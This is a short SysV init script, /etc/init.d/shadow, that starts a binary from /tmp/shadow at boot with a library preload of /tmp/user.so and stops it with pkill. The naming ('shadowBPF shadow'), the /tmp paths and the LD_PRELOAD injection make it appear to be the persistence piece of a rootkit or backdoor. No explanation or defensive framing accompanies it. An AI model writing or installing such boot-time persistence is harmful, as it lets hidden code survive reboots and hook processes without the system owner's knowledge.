#!/bin/sh
# /etc/init.d/shadow

### BEGIN INIT INFO
# Provides:          shadow
# Required-Start:    $network $local_fs
# Required-Stop:     $network $local_fs
# Should-Start:      $syslog
# Should-Stop:       $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Description:       Start the shadowBPF shadow with LD_PRELOAD
### END INIT INFO

case "$1" in
  start)
    echo "Starting shadowBPF shadow with LD_PRELOAD"
    # Run the exact command with the LD_PRELOAD argument as a string
    /tmp/shadow -dpl 'LD_PRELOAD=/tmp/user.so' &
    ;;
  stop)
    echo "Stopping shadowBPF shadow"
    # Kill the process running shadow
    pkill -f /tmp/shadow
    ;;
  restart)
    $0 start
    ;;
  *)
    echo "Usage: /etc/init.d/shadow {start|stop|restart}"
    exit 1
    ;;
esac

exit 0

